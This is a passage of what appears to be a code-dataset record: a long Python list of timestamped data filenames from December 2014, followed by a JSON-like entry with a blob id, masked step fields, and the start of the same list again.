'data2Wed_Dec_31_00_29_42_2014.txt',
'data2Wed_Dec_31_00_29_57_2014.txt',
'data2Wed_Dec_31_00_30_12_2014.txt',
'data2Wed_Dec_31_00_30_27_2014.txt',
'data2Wed_Dec_31_00_30_42_2014.txt',
'data2Wed_Dec_31_00_30_57_2014.txt',
'data2Wed_Dec_31_00_31_12_2014.txt',
'data2Wed_Dec_31_00_31_27_2014.txt',
'data2Wed_Dec_31_00_31_41_2014.txt',
'data2Wed_Dec_31_00_31_56_2014.txt',
'data2Wed_Dec_31_00_32_11_2014.txt',
'data2Wed_Dec_31_00_32_26_2014.txt',
'data2Wed_Dec_31_00_32_40_2014.txt',
'data2Wed_Dec_31_00_32_55_2014.txt',
'data2Wed_Dec_31_00_33_10_2014.txt',
'data2Wed_Dec_31_00_33_24_2014.txt',
'data2Wed_Dec_31_00_33_39_2014.txt',
'data2Wed_Dec_31_00_33_54_2014.txt',
'data2Wed_Dec_31_00_34_09_2014.txt',
'data3Wed_Dec_31_00_34_24_2014.txt',
'data3Wed_Dec_31_00_34_39_2014.txt',
'data3Wed_Dec_31_00_34_54_2014.txt',
'data3Wed_Dec_31_00_35_09_2014.txt',
'data3Wed_Dec_31_00_35_24_2014.txt',
'data3Wed_Dec_31_00_35_39_2014.txt',
'data3Wed_Dec_31_00_35_54_2014.txt',
'data3Wed_Dec_31_00_36_08_2014.txt',
'data3Wed_Dec_31_00_36_23_2014.txt',
'data3Wed_Dec_31_00_36_38_2014.txt',
'data3Wed_Dec_31_00_36_53_2014.txt',
'data3Wed_Dec_31_00_37_08_2014.txt',
'data3Wed_Dec_31_00_37_22_2014.txt',
'data3Wed_Dec_31_00_37_38_2014.txt',
'data3Wed_Dec_31_00_37_53_2014.txt',
'data3Wed_Dec_31_00_38_08_2014.txt',
'data3Wed_Dec_31_00_38_22_2014.txt',
'data3Wed_Dec_31_00_38_37_2014.txt',
'data3Wed_Dec_31_00_38_52_2014.txt',
'data3Wed_Dec_31_00_39_07_2014.txt',
'data3Wed_Dec_31_00_39_22_2014.txt',
'data3Wed_Dec_31_00_39_36_2014.txt',
'data3Wed_Dec_31_00_39_51_2014.txt',
'data3Wed_Dec_31_00_40_06_2014.txt',
'data3Wed_Dec_31_00_40_21_2014.txt',
'data3Wed_Dec_31_00_40_36_2014.txt',
'data3Wed_Dec_31_00_40_50_2014.txt',
'data3Wed_Dec_31_00_41_05_2014.txt',
'data3Wed_Dec_31_00_41_20_2014.txt',
'data3Wed_Dec_31_00_41_34_2014.txt',
'data3Wed_Dec_31_00_41_50_2014.txt',
'data3Wed_Dec_31_00_42_04_2014.txt',
'data3Wed_Dec_31_00_42_19_2014.txt',
'data3Wed_Dec_31_00_42_33_2014.txt',
'data3Wed_Dec_31_00_42_48_2014.txt',
'data3Wed_Dec_31_00_43_03_2014.txt',
'data3Wed_Dec_31_00_43_18_2014.txt',
'data3Wed_Dec_31_00_43_33_2014.txt',
'data3Wed_Dec_31_00_43_48_2014.txt',
'data3Wed_Dec_31_00_44_03_2014.txt',
'data3Wed_Dec_31_00_44_18_2014.txt',
'data3Wed_Dec_31_00_44_33_2014.txt',
'data3Wed_Dec_31_00_44_48_2014.txt',
'data3Wed_Dec_31_00_45_03_2014.txt',
'data3Wed_Dec_31_00_45_18_2014.txt',
'data3Wed_Dec_31_00_45_33_2014.txt',
'data3Wed_Dec_31_00_45_48_2014.txt',
'data3Wed_Dec_31_00_46_03_2014.txt',
'data3Wed_Dec_31_00_46_18_2014.txt',
'data3Wed_Dec_31_00_46_32_2014.txt']
|
flexible
|
{
"blob_id": "b63221af86748241fdce34052819569a06d37afe",
"index": 6965,
"step-1": "<mask token>\n",
"step-2": "files = ['data0Tue_Dec_30_20_37_34_2014.txt',\n 'data0Tue_Dec_30_20_37_49_2014.txt',\n 'data0Tue_Dec_30_20_38_04_2014.txt',\n 'data0Tue_Dec_30_20_38_19_2014.txt',\n 'data0Tue_Dec_30_20_38_34_2014.txt',\n 'data0Tue_Dec_30_20_38_49_2014.txt',\n 'data0Tue_Dec_30_20_39_04_2014.txt',\n 'data0Tue_Dec_30_20_39_19_2014.txt',\n 'data0Tue_Dec_30_20_39_34_2014.txt',\n 'data0Tue_Dec_30_20_39_49_2014.txt',\n 'data0Tue_Dec_30_20_40_04_2014.txt',\n 'data0Tue_Dec_30_20_40_19_2014.txt',\n 'data0Tue_Dec_30_20_40_34_2014.txt',\n 'data0Tue_Dec_30_20_40_49_2014.txt',\n 'data0Tue_Dec_30_20_41_04_2014.txt',\n 'data0Tue_Dec_30_20_41_18_2014.txt',\n 'data0Tue_Dec_30_20_41_34_2014.txt',\n 'data0Tue_Dec_30_20_41_49_2014.txt',\n 'data0Tue_Dec_30_20_42_04_2014.txt',\n 'data0Tue_Dec_30_20_42_19_2014.txt',\n 'data0Tue_Dec_30_20_42_34_2014.txt',\n 'data0Tue_Dec_30_20_42_49_2014.txt',\n 'data0Tue_Dec_30_20_43_04_2014.txt',\n 'data0Tue_Dec_30_20_43_19_2014.txt',\n 'data0Tue_Dec_30_20_43_34_2014.txt',\n 'data0Tue_Dec_30_20_43_49_2014.txt',\n 'data0Tue_Dec_30_20_44_04_2014.txt',\n 'data0Tue_Dec_30_20_44_19_2014.txt',\n 'data0Tue_Dec_30_20_44_34_2014.txt',\n 'data0Tue_Dec_30_20_44_49_2014.txt',\n 'data0Tue_Dec_30_20_45_04_2014.txt',\n 'data0Tue_Dec_30_20_45_19_2014.txt',\n 'data0Tue_Dec_30_20_45_34_2014.txt',\n 'data0Tue_Dec_30_20_45_49_2014.txt',\n 'data0Tue_Dec_30_20_46_04_2014.txt',\n 'data0Tue_Dec_30_20_46_19_2014.txt',\n 'data0Tue_Dec_30_20_46_34_2014.txt',\n 'data0Tue_Dec_30_20_46_49_2014.txt',\n 'data0Tue_Dec_30_20_47_04_2014.txt',\n 'data0Tue_Dec_30_20_47_19_2014.txt',\n 'data0Tue_Dec_30_20_47_34_2014.txt',\n 'data0Tue_Dec_30_20_47_50_2014.txt',\n 'data0Tue_Dec_30_20_48_05_2014.txt',\n 'data0Tue_Dec_30_20_48_20_2014.txt',\n 'data0Tue_Dec_30_20_48_35_2014.txt',\n 'data0Tue_Dec_30_20_48_50_2014.txt',\n 'data0Tue_Dec_30_20_49_05_2014.txt',\n 'data0Tue_Dec_30_20_49_20_2014.txt',\n 'data0Tue_Dec_30_20_49_35_2014.txt',\n 'data0Tue_Dec_30_20_49_50_2014.txt',\n 'data1Tue_Dec_30_20_50_05_2014.txt',\n 'data1Tue_Dec_30_20_50_20_2014.txt',\n 'data1Tue_Dec_30_20_50_35_2014.txt',\n 'data1Tue_Dec_30_20_50_50_2014.txt',\n 'data1Tue_Dec_30_20_51_05_2014.txt',\n 'data1Tue_Dec_30_20_51_20_2014.txt',\n 'data1Tue_Dec_30_20_51_35_2014.txt',\n 'data1Tue_Dec_30_20_51_50_2014.txt',\n 'data1Tue_Dec_30_20_52_05_2014.txt',\n 'data1Tue_Dec_30_20_52_20_2014.txt',\n 'data1Tue_Dec_30_20_52_35_2014.txt',\n 'data1Tue_Dec_30_20_52_50_2014.txt',\n 'data1Tue_Dec_30_20_53_05_2014.txt',\n 'data1Tue_Dec_30_20_53_20_2014.txt',\n 'data1Tue_Dec_30_20_53_35_2014.txt',\n 'data1Tue_Dec_30_20_53_50_2014.txt',\n 'data1Tue_Dec_30_20_54_04_2014.txt',\n 'data1Tue_Dec_30_20_54_19_2014.txt',\n 'data1Tue_Dec_30_20_54_34_2014.txt',\n 'data1Tue_Dec_30_20_54_49_2014.txt',\n 'data1Tue_Dec_30_20_55_04_2014.txt',\n 'data1Tue_Dec_30_20_55_19_2014.txt',\n 'data1Tue_Dec_30_20_55_34_2014.txt',\n 'data1Tue_Dec_30_20_55_49_2014.txt',\n 'data1Tue_Dec_30_20_56_04_2014.txt',\n 'data1Tue_Dec_30_20_56_19_2014.txt',\n 'data1Tue_Dec_30_20_56_34_2014.txt',\n 'data1Tue_Dec_30_20_56_49_2014.txt',\n 'data1Tue_Dec_30_20_57_04_2014.txt',\n 'data1Tue_Dec_30_20_57_19_2014.txt',\n 'data1Tue_Dec_30_20_57_33_2014.txt',\n 'data1Tue_Dec_30_20_57_48_2014.txt',\n 'data1Tue_Dec_30_20_58_03_2014.txt',\n 'data1Tue_Dec_30_20_58_18_2014.txt',\n 'data1Tue_Dec_30_20_58_33_2014.txt',\n 'data1Tue_Dec_30_20_58_48_2014.txt',\n 'data1Tue_Dec_30_20_59_03_2014.txt',\n 'data1Tue_Dec_30_20_59_18_2014.txt',\n 'data1Tue_Dec_30_20_59_33_2014.txt',\n 'data1Tue_Dec_30_20_59_48_2014.txt',\n 'data1Tue_Dec_30_21_00_03_2014.txt',\n 'data1Tue_Dec_30_21_00_17_2014.txt',\n 'data1Tue_Dec_30_21_00_32_2014.txt',\n 'data1Tue_Dec_30_21_00_47_2014.txt',\n 'data1Tue_Dec_30_21_01_02_2014.txt',\n 'data1Tue_Dec_30_21_01_17_2014.txt',\n 'data1Tue_Dec_30_21_01_32_2014.txt',\n 'data1Tue_Dec_30_21_01_47_2014.txt',\n 'data1Tue_Dec_30_21_02_03_2014.txt',\n 'data1Tue_Dec_30_21_02_17_2014.txt',\n 'data2Tue_Dec_30_21_02_32_2014.txt',\n 'data2Tue_Dec_30_21_02_47_2014.txt',\n 'data2Tue_Dec_30_21_03_02_2014.txt',\n 'data2Tue_Dec_30_21_03_17_2014.txt',\n 'data2Tue_Dec_30_21_03_32_2014.txt',\n 'data2Tue_Dec_30_21_03_47_2014.txt',\n 'data2Tue_Dec_30_21_04_02_2014.txt',\n 'data2Tue_Dec_30_21_04_17_2014.txt',\n 'data2Tue_Dec_30_21_04_31_2014.txt',\n 'data2Tue_Dec_30_21_04_46_2014.txt',\n 'data2Tue_Dec_30_21_05_01_2014.txt',\n 'data2Tue_Dec_30_21_05_16_2014.txt',\n 'data2Tue_Dec_30_21_05_31_2014.txt',\n 'data2Tue_Dec_30_21_05_45_2014.txt',\n 'data2Tue_Dec_30_21_06_00_2014.txt',\n 'data2Tue_Dec_30_21_06_16_2014.txt',\n 'data2Tue_Dec_30_21_06_31_2014.txt',\n 'data2Tue_Dec_30_21_06_46_2014.txt',\n 'data2Tue_Dec_30_21_07_01_2014.txt',\n 'data2Tue_Dec_30_21_07_16_2014.txt',\n 'data2Tue_Dec_30_21_07_31_2014.txt',\n 'data2Tue_Dec_30_21_07_46_2014.txt',\n 'data2Tue_Dec_30_21_08_01_2014.txt',\n 'data2Tue_Dec_30_21_08_16_2014.txt',\n 'data2Tue_Dec_30_21_08_30_2014.txt',\n 'data2Tue_Dec_30_21_08_45_2014.txt',\n 'data2Tue_Dec_30_21_09_01_2014.txt',\n 'data2Tue_Dec_30_21_09_16_2014.txt',\n 'data2Tue_Dec_30_21_09_31_2014.txt',\n 'data2Tue_Dec_30_21_09_46_2014.txt',\n 'data2Tue_Dec_30_21_10_00_2014.txt',\n 'data2Tue_Dec_30_21_10_16_2014.txt',\n 'data2Tue_Dec_30_21_10_31_2014.txt',\n 'data2Tue_Dec_30_21_10_45_2014.txt',\n 'data2Tue_Dec_30_21_11_00_2014.txt',\n 'data2Tue_Dec_30_21_11_16_2014.txt',\n 'data2Tue_Dec_30_21_11_31_2014.txt',\n 'data2Tue_Dec_30_21_11_45_2014.txt',\n 'data2Tue_Dec_30_21_12_01_2014.txt',\n 'data2Tue_Dec_30_21_12_16_2014.txt',\n 'data2Tue_Dec_30_21_12_31_2014.txt',\n 'data2Tue_Dec_30_21_12_46_2014.txt',\n 'data2Tue_Dec_30_21_13_00_2014.txt',\n 'data2Tue_Dec_30_21_13_15_2014.txt',\n 'data2Tue_Dec_30_21_13_31_2014.txt',\n 'data2Tue_Dec_30_21_13_46_2014.txt',\n 'data2Tue_Dec_30_21_14_00_2014.txt',\n 'data2Tue_Dec_30_21_14_15_2014.txt',\n 'data2Tue_Dec_30_21_14_30_2014.txt',\n 'data2Tue_Dec_30_21_14_45_2014.txt',\n 'data3Tue_Dec_30_21_15_00_2014.txt',\n 'data3Tue_Dec_30_21_15_15_2014.txt',\n 'data3Tue_Dec_30_21_15_29_2014.txt',\n 'data3Tue_Dec_30_21_15_44_2014.txt',\n 'data3Tue_Dec_30_21_15_59_2014.txt',\n 'data3Tue_Dec_30_21_16_15_2014.txt',\n 'data3Tue_Dec_30_21_16_30_2014.txt',\n 'data3Tue_Dec_30_21_16_44_2014.txt',\n 'data3Tue_Dec_30_21_16_59_2014.txt',\n 'data3Tue_Dec_30_21_17_15_2014.txt',\n 'data3Tue_Dec_30_21_17_29_2014.txt',\n 'data3Tue_Dec_30_21_17_45_2014.txt',\n 'data3Tue_Dec_30_21_18_00_2014.txt',\n 'data3Tue_Dec_30_21_18_15_2014.txt',\n 'data3Tue_Dec_30_21_18_29_2014.txt',\n 'data3Tue_Dec_30_21_18_44_2014.txt',\n 'data3Tue_Dec_30_21_18_59_2014.txt',\n 'data3Tue_Dec_30_21_19_14_2014.txt',\n 'data3Tue_Dec_30_21_19_29_2014.txt',\n 'data3Tue_Dec_30_21_19_44_2014.txt',\n 'data3Tue_Dec_30_21_19_59_2014.txt',\n 'data3Tue_Dec_30_21_20_14_2014.txt',\n 'data3Tue_Dec_30_21_20_29_2014.txt',\n 'data3Tue_Dec_30_21_20_45_2014.txt',\n 'data3Tue_Dec_30_21_21_00_2014.txt',\n 'data3Tue_Dec_30_21_21_15_2014.txt',\n 'data3Tue_Dec_30_21_21_30_2014.txt',\n 'data3Tue_Dec_30_21_21_45_2014.txt',\n 'data3Tue_Dec_30_21_21_59_2014.txt',\n 'data3Tue_Dec_30_21_22_14_2014.txt',\n 'data3Tue_Dec_30_21_22_29_2014.txt',\n 'data3Tue_Dec_30_21_22_44_2014.txt',\n 'data3Tue_Dec_30_21_22_58_2014.txt',\n 'data3Tue_Dec_30_21_23_14_2014.txt',\n 'data3Tue_Dec_30_21_23_28_2014.txt',\n 'data3Tue_Dec_30_21_23_43_2014.txt',\n 'data3Tue_Dec_30_21_23_58_2014.txt',\n 'data3Tue_Dec_30_21_24_13_2014.txt',\n 'data3Tue_Dec_30_21_24_28_2014.txt',\n 'data3Tue_Dec_30_21_24_43_2014.txt',\n 'data3Tue_Dec_30_21_24_58_2014.txt',\n 'data3Tue_Dec_30_21_25_12_2014.txt',\n 'data3Tue_Dec_30_21_25_28_2014.txt',\n 'data3Tue_Dec_30_21_25_43_2014.txt',\n 'data3Tue_Dec_30_21_25_58_2014.txt',\n 'data3Tue_Dec_30_21_26_12_2014.txt',\n 'data3Tue_Dec_30_21_26_27_2014.txt',\n 'data3Tue_Dec_30_21_26_42_2014.txt',\n 'data3Tue_Dec_30_21_26_57_2014.txt',\n 'data3Tue_Dec_30_21_27_12_2014.txt',\n 'data0Tue_Dec_30_21_27_52_2014.txt',\n 'data0Tue_Dec_30_21_28_07_2014.txt',\n 'data0Tue_Dec_30_21_28_22_2014.txt',\n 'data0Tue_Dec_30_21_28_37_2014.txt',\n 'data0Tue_Dec_30_21_28_51_2014.txt',\n 'data0Tue_Dec_30_21_29_06_2014.txt',\n 'data0Tue_Dec_30_21_29_21_2014.txt',\n 'data0Tue_Dec_30_21_29_36_2014.txt',\n 'data0Tue_Dec_30_21_29_51_2014.txt',\n 'data0Tue_Dec_30_21_30_06_2014.txt',\n 'data0Tue_Dec_30_21_30_21_2014.txt',\n 'data0Tue_Dec_30_21_30_36_2014.txt',\n 'data0Tue_Dec_30_21_30_50_2014.txt',\n 'data0Tue_Dec_30_21_31_06_2014.txt',\n 'data0Tue_Dec_30_21_31_21_2014.txt',\n 'data0Tue_Dec_30_21_31_36_2014.txt',\n 'data0Tue_Dec_30_21_31_51_2014.txt',\n 'data0Tue_Dec_30_21_32_06_2014.txt',\n 'data0Tue_Dec_30_21_32_21_2014.txt',\n 'data0Tue_Dec_30_21_32_36_2014.txt',\n 'data0Tue_Dec_30_21_32_51_2014.txt',\n 'data0Tue_Dec_30_21_33_05_2014.txt',\n 'data0Tue_Dec_30_21_33_20_2014.txt',\n 'data0Tue_Dec_30_21_33_35_2014.txt',\n 'data0Tue_Dec_30_21_33_50_2014.txt',\n 'data0Tue_Dec_30_21_34_05_2014.txt',\n 'data0Tue_Dec_30_21_34_20_2014.txt',\n 'data0Tue_Dec_30_21_34_34_2014.txt',\n 'data0Tue_Dec_30_21_34_49_2014.txt',\n 'data0Tue_Dec_30_21_35_04_2014.txt',\n 'data0Tue_Dec_30_21_35_20_2014.txt',\n 'data0Tue_Dec_30_21_35_35_2014.txt',\n 'data0Tue_Dec_30_21_35_49_2014.txt',\n 'data0Tue_Dec_30_21_36_04_2014.txt',\n 'data0Tue_Dec_30_21_36_19_2014.txt',\n 'data0Tue_Dec_30_21_36_34_2014.txt',\n 'data0Tue_Dec_30_21_36_49_2014.txt',\n 'data0Tue_Dec_30_21_37_04_2014.txt',\n 'data0Tue_Dec_30_21_37_19_2014.txt',\n 'data0Tue_Dec_30_21_37_34_2014.txt',\n 'data0Tue_Dec_30_21_37_49_2014.txt',\n 'data0Tue_Dec_30_21_38_04_2014.txt',\n 'data0Tue_Dec_30_21_38_18_2014.txt',\n 'data0Tue_Dec_30_21_38_33_2014.txt',\n 'data0Tue_Dec_30_21_38_48_2014.txt',\n 'data0Tue_Dec_30_21_39_03_2014.txt',\n 'data0Tue_Dec_30_21_39_18_2014.txt',\n 'data0Tue_Dec_30_21_39_33_2014.txt',\n 'data0Tue_Dec_30_21_39_48_2014.txt',\n 'data0Tue_Dec_30_21_40_02_2014.txt',\n 'data1Tue_Dec_30_21_40_18_2014.txt',\n 'data1Tue_Dec_30_21_40_33_2014.txt',\n 'data1Tue_Dec_30_21_40_48_2014.txt',\n 'data1Tue_Dec_30_21_41_02_2014.txt',\n 'data1Tue_Dec_30_21_41_17_2014.txt',\n 'data1Tue_Dec_30_21_41_31_2014.txt',\n 'data1Tue_Dec_30_21_41_46_2014.txt',\n 'data1Tue_Dec_30_21_42_01_2014.txt',\n 'data1Tue_Dec_30_21_42_16_2014.txt',\n 'data1Tue_Dec_30_21_42_31_2014.txt',\n 'data1Tue_Dec_30_21_42_46_2014.txt',\n 'data1Tue_Dec_30_21_43_01_2014.txt',\n 'data1Tue_Dec_30_21_43_16_2014.txt',\n 'data1Tue_Dec_30_21_43_31_2014.txt',\n 'data1Tue_Dec_30_21_43_46_2014.txt',\n 'data1Tue_Dec_30_21_44_01_2014.txt',\n 'data1Tue_Dec_30_21_44_15_2014.txt',\n 'data1Tue_Dec_30_21_44_30_2014.txt',\n 'data1Tue_Dec_30_21_44_46_2014.txt',\n 'data1Tue_Dec_30_21_45_01_2014.txt',\n 'data1Tue_Dec_30_21_45_15_2014.txt',\n 'data1Tue_Dec_30_21_45_30_2014.txt',\n 'data1Tue_Dec_30_21_45_45_2014.txt',\n 'data1Tue_Dec_30_21_46_00_2014.txt',\n 'data1Tue_Dec_30_21_46_15_2014.txt',\n 'data1Tue_Dec_30_21_46_29_2014.txt',\n 'data1Tue_Dec_30_21_46_44_2014.txt',\n 'data1Tue_Dec_30_21_46_59_2014.txt',\n 'data1Tue_Dec_30_21_47_14_2014.txt',\n 'data1Tue_Dec_30_21_47_29_2014.txt',\n 'data1Tue_Dec_30_21_47_44_2014.txt',\n 'data1Tue_Dec_30_21_47_59_2014.txt',\n 'data1Tue_Dec_30_21_48_13_2014.txt',\n 'data1Tue_Dec_30_21_48_28_2014.txt',\n 'data1Tue_Dec_30_21_48_43_2014.txt',\n 'data1Tue_Dec_30_21_48_58_2014.txt',\n 'data1Tue_Dec_30_21_49_13_2014.txt',\n 'data1Tue_Dec_30_21_49_28_2014.txt',\n 'data1Tue_Dec_30_21_49_43_2014.txt',\n 'data1Tue_Dec_30_21_49_57_2014.txt',\n 'data1Tue_Dec_30_21_50_13_2014.txt',\n 'data1Tue_Dec_30_21_50_27_2014.txt',\n 'data1Tue_Dec_30_21_50_42_2014.txt',\n 'data1Tue_Dec_30_21_50_57_2014.txt',\n 'data1Tue_Dec_30_21_51_12_2014.txt',\n 'data1Tue_Dec_30_21_51_27_2014.txt',\n 'data1Tue_Dec_30_21_51_42_2014.txt',\n 'data1Tue_Dec_30_21_51_56_2014.txt',\n 'data1Tue_Dec_30_21_52_11_2014.txt',\n 'data1Tue_Dec_30_21_52_26_2014.txt',\n 'data2Tue_Dec_30_21_52_40_2014.txt',\n 'data2Tue_Dec_30_21_52_55_2014.txt',\n 'data2Tue_Dec_30_21_53_10_2014.txt',\n 'data2Tue_Dec_30_21_53_25_2014.txt',\n 'data2Tue_Dec_30_21_53_40_2014.txt',\n 'data2Tue_Dec_30_21_53_54_2014.txt',\n 'data2Tue_Dec_30_21_54_09_2014.txt',\n 'data2Tue_Dec_30_21_54_24_2014.txt',\n 'data2Tue_Dec_30_21_54_39_2014.txt',\n 'data2Tue_Dec_30_21_54_53_2014.txt',\n 'data2Tue_Dec_30_21_55_08_2014.txt',\n 'data2Tue_Dec_30_21_55_23_2014.txt',\n 'data2Tue_Dec_30_21_55_38_2014.txt',\n 'data2Tue_Dec_30_21_55_53_2014.txt',\n 'data2Tue_Dec_30_21_56_08_2014.txt',\n 'data2Tue_Dec_30_21_56_23_2014.txt',\n 'data2Tue_Dec_30_21_56_37_2014.txt',\n 'data2Tue_Dec_30_21_56_52_2014.txt',\n 'data2Tue_Dec_30_21_57_07_2014.txt',\n 'data2Tue_Dec_30_21_57_22_2014.txt',\n 'data2Tue_Dec_30_21_57_37_2014.txt',\n 'data2Tue_Dec_30_21_57_51_2014.txt',\n 'data2Tue_Dec_30_21_58_06_2014.txt',\n 'data2Tue_Dec_30_21_58_21_2014.txt',\n 'data2Tue_Dec_30_21_58_35_2014.txt',\n 'data2Tue_Dec_30_21_58_50_2014.txt',\n 'data2Tue_Dec_30_21_59_05_2014.txt',\n 'data2Tue_Dec_30_21_59_20_2014.txt',\n 'data2Tue_Dec_30_21_59_34_2014.txt',\n 'data2Tue_Dec_30_21_59_50_2014.txt',\n 'data2Tue_Dec_30_22_00_05_2014.txt',\n 'data2Tue_Dec_30_22_00_19_2014.txt',\n 'data2Tue_Dec_30_22_00_34_2014.txt',\n 'data2Tue_Dec_30_22_00_49_2014.txt',\n 'data2Tue_Dec_30_22_01_03_2014.txt',\n 'data2Tue_Dec_30_22_01_18_2014.txt',\n 'data2Tue_Dec_30_22_01_33_2014.txt',\n 'data2Tue_Dec_30_22_01_48_2014.txt',\n 'data2Tue_Dec_30_22_02_03_2014.txt',\n 'data2Tue_Dec_30_22_02_18_2014.txt',\n 'data2Tue_Dec_30_22_02_32_2014.txt',\n 'data2Tue_Dec_30_22_02_47_2014.txt',\n 'data2Tue_Dec_30_22_03_02_2014.txt',\n 'data2Tue_Dec_30_22_03_17_2014.txt',\n 'data2Tue_Dec_30_22_03_31_2014.txt',\n 'data2Tue_Dec_30_22_03_46_2014.txt',\n 'data2Tue_Dec_30_22_04_01_2014.txt',\n 'data2Tue_Dec_30_22_04_15_2014.txt',\n 'data2Tue_Dec_30_22_04_30_2014.txt',\n 'data2Tue_Dec_30_22_04_45_2014.txt',\n 'data3Tue_Dec_30_22_05_00_2014.txt',\n 'data3Tue_Dec_30_22_05_15_2014.txt',\n 'data3Tue_Dec_30_22_05_30_2014.txt',\n 'data3Tue_Dec_30_22_05_44_2014.txt',\n 'data3Tue_Dec_30_22_06_00_2014.txt',\n 'data3Tue_Dec_30_22_06_14_2014.txt',\n 'data3Tue_Dec_30_22_06_29_2014.txt',\n 'data3Tue_Dec_30_22_06_44_2014.txt',\n 'data3Tue_Dec_30_22_06_59_2014.txt',\n 'data3Tue_Dec_30_22_07_14_2014.txt',\n 'data3Tue_Dec_30_22_07_29_2014.txt',\n 'data3Tue_Dec_30_22_07_43_2014.txt',\n 'data3Tue_Dec_30_22_07_58_2014.txt',\n 'data3Tue_Dec_30_22_08_13_2014.txt',\n 'data3Tue_Dec_30_22_08_28_2014.txt',\n 'data3Tue_Dec_30_22_08_43_2014.txt',\n 'data3Tue_Dec_30_22_08_57_2014.txt',\n 'data3Tue_Dec_30_22_09_12_2014.txt',\n 'data3Tue_Dec_30_22_09_27_2014.txt',\n 'data3Tue_Dec_30_22_09_42_2014.txt',\n 'data3Tue_Dec_30_22_09_57_2014.txt',\n 'data3Tue_Dec_30_22_10_12_2014.txt',\n 'data3Tue_Dec_30_22_10_26_2014.txt',\n 'data3Tue_Dec_30_22_10_41_2014.txt',\n 'data3Tue_Dec_30_22_10_56_2014.txt',\n 'data3Tue_Dec_30_22_11_11_2014.txt',\n 'data3Tue_Dec_30_22_11_25_2014.txt',\n 'data3Tue_Dec_30_22_11_41_2014.txt',\n 'data3Tue_Dec_30_22_11_56_2014.txt',\n 'data3Tue_Dec_30_22_12_11_2014.txt',\n 'data3Tue_Dec_30_22_12_26_2014.txt',\n 'data3Tue_Dec_30_22_12_40_2014.txt',\n 'data3Tue_Dec_30_22_12_55_2014.txt',\n 'data3Tue_Dec_30_22_13_10_2014.txt',\n 'data3Tue_Dec_30_22_13_25_2014.txt',\n 'data3Tue_Dec_30_22_13_40_2014.txt',\n 'data3Tue_Dec_30_22_13_55_2014.txt',\n 'data3Tue_Dec_30_22_14_09_2014.txt',\n 'data3Tue_Dec_30_22_14_24_2014.txt',\n 'data3Tue_Dec_30_22_14_39_2014.txt',\n 'data3Tue_Dec_30_22_14_53_2014.txt',\n 'data3Tue_Dec_30_22_15_08_2014.txt',\n 'data3Tue_Dec_30_22_15_23_2014.txt',\n 'data3Tue_Dec_30_22_15_37_2014.txt',\n 'data3Tue_Dec_30_22_15_52_2014.txt',\n 'data3Tue_Dec_30_22_16_07_2014.txt',\n 'data3Tue_Dec_30_22_16_22_2014.txt',\n 'data3Tue_Dec_30_22_16_36_2014.txt',\n 'data3Tue_Dec_30_22_16_51_2014.txt',\n 'data3Tue_Dec_30_22_17_06_2014.txt',\n 'data0Tue_Dec_30_22_17_47_2014.txt',\n 'data0Tue_Dec_30_22_18_01_2014.txt',\n 'data0Tue_Dec_30_22_18_16_2014.txt',\n 'data0Tue_Dec_30_22_18_31_2014.txt',\n 'data0Tue_Dec_30_22_18_46_2014.txt',\n 'data0Tue_Dec_30_22_19_01_2014.txt',\n 'data0Tue_Dec_30_22_19_15_2014.txt',\n 'data0Tue_Dec_30_22_19_30_2014.txt',\n 'data0Tue_Dec_30_22_19_45_2014.txt',\n 'data0Tue_Dec_30_22_20_00_2014.txt',\n 'data0Tue_Dec_30_22_20_15_2014.txt',\n 'data0Tue_Dec_30_22_20_30_2014.txt',\n 'data0Tue_Dec_30_22_20_44_2014.txt',\n 'data0Tue_Dec_30_22_20_59_2014.txt',\n 'data0Tue_Dec_30_22_21_14_2014.txt',\n 'data0Tue_Dec_30_22_21_29_2014.txt',\n 'data0Tue_Dec_30_22_21_44_2014.txt',\n 'data0Tue_Dec_30_22_21_58_2014.txt',\n 'data0Tue_Dec_30_22_22_13_2014.txt',\n 'data0Tue_Dec_30_22_22_28_2014.txt',\n 'data0Tue_Dec_30_22_22_43_2014.txt',\n 'data0Tue_Dec_30_22_22_58_2014.txt',\n 'data0Tue_Dec_30_22_23_12_2014.txt',\n 'data0Tue_Dec_30_22_23_27_2014.txt',\n 'data0Tue_Dec_30_22_23_42_2014.txt',\n 'data0Tue_Dec_30_22_23_57_2014.txt',\n 'data0Tue_Dec_30_22_24_12_2014.txt',\n 'data0Tue_Dec_30_22_24_26_2014.txt',\n 'data0Tue_Dec_30_22_24_41_2014.txt',\n 'data0Tue_Dec_30_22_24_56_2014.txt',\n 'data0Tue_Dec_30_22_25_11_2014.txt',\n 'data0Tue_Dec_30_22_25_25_2014.txt',\n 'data0Tue_Dec_30_22_25_41_2014.txt',\n 'data0Tue_Dec_30_22_25_55_2014.txt',\n 'data0Tue_Dec_30_22_26_10_2014.txt',\n 'data0Tue_Dec_30_22_26_25_2014.txt',\n 'data0Tue_Dec_30_22_26_39_2014.txt',\n 'data0Tue_Dec_30_22_26_54_2014.txt',\n 'data0Tue_Dec_30_22_27_09_2014.txt',\n 'data0Tue_Dec_30_22_27_24_2014.txt',\n 'data0Tue_Dec_30_22_27_39_2014.txt',\n 'data0Tue_Dec_30_22_27_54_2014.txt',\n 'data0Tue_Dec_30_22_28_09_2014.txt',\n 'data0Tue_Dec_30_22_28_23_2014.txt',\n 'data0Tue_Dec_30_22_28_38_2014.txt',\n 'data0Tue_Dec_30_22_28_53_2014.txt',\n 'data0Tue_Dec_30_22_29_08_2014.txt',\n 'data0Tue_Dec_30_22_29_23_2014.txt',\n 'data0Tue_Dec_30_22_29_37_2014.txt',\n 'data0Tue_Dec_30_22_29_52_2014.txt',\n 'data1Tue_Dec_30_22_30_07_2014.txt',\n 'data1Tue_Dec_30_22_30_21_2014.txt',\n 'data1Tue_Dec_30_22_30_36_2014.txt',\n 'data1Tue_Dec_30_22_30_51_2014.txt',\n 'data1Tue_Dec_30_22_31_06_2014.txt',\n 'data1Tue_Dec_30_22_31_20_2014.txt',\n 'data1Tue_Dec_30_22_31_35_2014.txt',\n 'data1Tue_Dec_30_22_31_49_2014.txt',\n 'data1Tue_Dec_30_22_32_04_2014.txt',\n 'data1Tue_Dec_30_22_32_19_2014.txt',\n 'data1Tue_Dec_30_22_32_34_2014.txt',\n 'data1Tue_Dec_30_22_32_48_2014.txt',\n 'data1Tue_Dec_30_22_33_03_2014.txt',\n 'data1Tue_Dec_30_22_33_18_2014.txt',\n 'data1Tue_Dec_30_22_33_33_2014.txt',\n 'data1Tue_Dec_30_22_33_48_2014.txt',\n 'data1Tue_Dec_30_22_34_03_2014.txt',\n 'data1Tue_Dec_30_22_34_17_2014.txt',\n 'data1Tue_Dec_30_22_34_32_2014.txt',\n 